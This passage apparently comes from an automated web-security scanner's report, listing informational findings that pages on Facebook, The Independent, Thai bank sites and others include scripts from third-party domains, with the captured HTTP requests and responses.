Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.171.104
Connection: close
Date: Tue, 03 May 2011 13:34:01 GMT
Content-Length: 239760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

23.67. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110503_0700%26ssh%3DS995825291%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.47.43
X-Cnection: close
Date: Tue, 03 May 2011 12:12:45 GMT
Content-Length: 8633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

23.68. http://www.independent.co.uk/news/world/asia/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /news/world/asia/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world/asia/x26amp HTTP/1.1
Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:33:30 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: JSESSIONID=9A22AF1D575693F0AECFB775E75FBEC7; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 73917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.f
...[SNIP]...
</script>

               <script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
<!-- Start Revenue Science Tag -->
<script type="text/javascript" language="javascript" src="http://js.revsci.net/gateway/gw.js?csid=D05509" charset="ISO-8859-1"></script>
...[SNIP]...

23.69. http://www.independent.co.uk/news/world/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /news/world/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world/x26amp HTTP/1.1
Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:33:33 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: JSESSIONID=870E3BEDB5E937E1D6E7BC0ED11869A0; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 73917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.f
...[SNIP]...
</script>

               <script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
<!-- Start Revenue Science Tag -->
<script type="text/javascript" language="javascript" src="http://js.revsci.net/gateway/gw.js?csid=D05509" charset="ISO-8859-1"></script>
...[SNIP]...

23.70. http://www.independent.co.uk/news/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /news/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/x26amp HTTP/1.1
Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:33:33 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: JSESSIONID=0BE25EBF416370901D26EB60FF42CDDF; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 73917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.f
...[SNIP]...
</script>

               <script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
<!-- Start Revenue Science Tag -->
<script type="text/javascript" language="javascript" src="http://js.revsci.net/gateway/gw.js?csid=D05509" charset="ISO-8859-1"></script>
...[SNIP]...

23.71. http://www.kasikornbank.com/Pages/truehitsstat.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kasikornbank.com
Path:   /Pages/truehitsstat.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Pages/truehitsstat.html?pagename=(en)%20Menu%20Item%20Navigation:%20/EN/Pages/Default.aspx HTTP/1.1
Host: www.kasikornbank.com
Proxy-Connection: keep-alive
Referer: http://www.kasikornbank.com/EN/Pages/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211127951.1304443502.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Kasikorn%20Bank; __utma=211127951.1235232646.1304443502.1304443502.1304443502.1; __utmc=211127951; __utmb=211127951.1.10.1304443502

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Type: text/html
Last-Modified: Tue, 03 May 2011 10:47:15 GMT
ETag: "{1C07B3B6-9458-43A0-8754-31CB185703B4},17908"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
ResourceTag: rt:1C07B3B6-9458-43A0-8754-31CB185703B4@00000017908
Exires: Mon, 18 Apr 2011 12:25:05 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:25:05 GMT
Content-Length: 8648

<script language="javascript1.1">
var page="dummy";

var qsParm = new Array();
function qs() {
var query = window.location.search.substring(1);
var parms = query.split('&');
for (var i=0;
...[SNIP]...
</script> -->
<script language="javascript1.1" src="http://hits.truehits.in.th/data/f0010172.js"></script>
...[SNIP]...

23.72. http://www.khonkaen.com/english/forum/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.khonkaen.com
Path:   /english/forum/default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /english/forum/default.asp HTTP/1.1
Host: www.khonkaen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:35:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 56230
Content-Type: text/html
Expires: Sun, 01 May 2011 13:35:08 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D05%2D03+09%3A35%3A08; expires=Thu, 03-May-2012 13:35:08 GMT; path=/english/forum/
Set-Cookie: WWF9sID=SID=f164d34f8z5551bee8bz1c9f5zddd61d; path=/english/forum/
Set-Cookie: ASPSESSIONIDAADRARSA=HLEDHHGDIEGBPGHDMNPDLMJJ; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.73. http://www.ktb.co.th/en/ktb_group/main.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktb.co.th
Path:   /en/ktb_group/main.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/ktb_group/main.jsp HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:14 GMT
Content-type: text/html; charset=utf-8
Content-Length: 16764


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<link href="../../css/master.css"
...[SNIP]...
<!--BEGIN WEB STAT CODE-->

<script language="javascript1.1" src="http://hits.truehits.in.th/data/q0027704.js"></script>
...[SNIP]...

23.74. http://www.ktb.co.th/en/main/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktb.co.th
Path:   /en/main/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/main/ HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/url?sa=t&source=web&cd=1&ved=0CCUQFjAA&url=http%3A%2F%2Fwww.ktb.co.th%2Fen%2Fmain%2F&rct=j&q=Krung%20Thai%20Bank&ei=qeq_Tfr2CsOTtweWz5GlBQ&usg=AFQjCNEdcx3psLKqIE7sm2HW36Z3XFsh5Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:46 GMT
Content-type: text/html; charset=utf-8
Set-cookie: JSESSIONID=1C23CE5BF6D8DD1E66A9A9AACB11404A;Path=/
Content-Length: 21095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="../../css/master.css" medi
...[SNIP]...
<!--BEGIN WEB STAT CODE-->

<script language="javascript1.1" src="http://hits.truehits.in.th/data/q0027704.js"></script>
...[SNIP]...

23.75. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /william-catherine-royal-wedding-dvd/detail.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products HTTP/1.1
Host: www.nbcuniversalstore.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/
Cookie: SESSID=dd19ab195577124911a017a83007c863; DASHORTNAME=nbcuniversalstore; DAABTEST=B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Tue, 03 May 2011 13:32:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:59 GMT
Connection: close
Set-Cookie: DACART=deleted; expires=Mon, 03-May-2010 13:32:57 GMT; path=/; domain=nbcuniversalstore.com
Content-Length: 82600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
...[SNIP]...
<iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=5;sz=246x100;ord=1304429578?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=5;sz=246x100;abr=!ie;ord=1304429578?"></script>
...[SNIP]...
<iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=6;sz=726x100;ord=1304429578?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=6;sz=726x100;abr=!ie;ord=1304429578?"></script>
...[SNIP]...
<div id="contentHolder">


<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"></script>
...[SNIP]...
<iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=7;sz=246x100;ord=1304429578?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=7;sz=246x100;abr=!ie;ord=1304429578?"></script>
...[SNIP]...
<iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/homepage;tile=8;sz=726x100;ord=1304429578?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/homepage;tile=8;sz=726x100;abr=!ie;ord=1304429578?"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27">
</script>
...[SNIP]...
</iframe>

<script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"></script>
...[SNIP]...

23.76. http://www.newsroom.barclays.com/content/Detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsroom.barclays.com
Path:   /content/Detail.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /content/Detail.aspx?ReleaseID=1963&NewsAreaID=2 HTTP/1.1
Host: www.newsroom.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454061117:ss=1304454046661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=s3icnwhgvna4gjofmlqfljdd; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:21:42 GMT
Content-Length: 68575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<!--meta tags end-->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2cpost%2cmail&amp;charset=utf-8&amp;style=default&amp;publisher=8413553c-d736-49fa-b695-f267b7a9b4af"></script>
...[SNIP]...

23.77. http://www.scb.co.th/en/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/home HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Siam+Commercial+Bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:23:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=0flc3ca07u3lh2ij95rl4mm2l1; path=/
Expires: Wed, 03 Nov 2010 12:23:10 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13961

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>The Siam Commercial Bank : To be the Bank of Choice for our Customers, Shareholders, Empolyee and Community</ti
...[SNIP]...
<span class="truehit"><script language="javascript1.1" src="http://hits.truehits.in.th/data/s0028564.js"></script>
...[SNIP]...

23.78. http://www.scb.co.th/en/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/home/ HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/landing.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:33:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=8d1lr93egf7bhidm9atbjg9716; path=/
Expires: Wed, 03 Nov 2010 12:33:34 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13926

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>The Siam Commercial Bank : To be the Bank of Choice for our Customers, Shareholders, Empolyee and Community</ti
...[SNIP]...
<span class="truehit"><script language="javascript1.1" src="http://hits.truehits.in.th/data/s0028564.js"></script>
...[SNIP]...

23.79. http://www.scriptlogic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.1.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=landing%3Egoogle%3Epackettrapit%3Ewireless; s_nr=1304447524201-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253Dlanding%25253Egoogle%25253Epackettrapit%25253Ewireless%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: EntryPointCheck=5/3/2011 9:43:23 AM; domain=scriptlogic.com; expires=Fri, 03-Jun-2011 13:43:23 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1"
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Clicky -->
<script src="http://static.getclicky.com/47665.js" type="text/javascript"></script>
...[SNIP]...

23.80. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /landing/google/packettrapit/wireless.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</style>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js"></script>
...[SNIP]...
<!-- Clicky -->
<script src="http://static.getclicky.com/47665.js" type="text/javascript"></script>
...[SNIP]...

23.81. http://www.sedoparking.com/search/registrar.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sedoparking.com
Path:   /search/registrar.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com HTTP/1.1
Host: www.sedoparking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.formlessnetworking.com/

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:42:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 13:42:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=78431ea53addac790fabbb520eb3d47a; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=formlessnetworking.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
X-Cache: MISS from 835865
Connection: close
Content-Length: 20768

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><noscript>
   <meta http-equiv="refresh" content="0; URL=http://www.sedoparking.com/se
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
...[SNIP]...
</script>
   <script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...

23.82. http://www.set.or.th/en/contact/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/contact/contact.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/contact/contact.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=418

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:30 GMT
Server: Apache
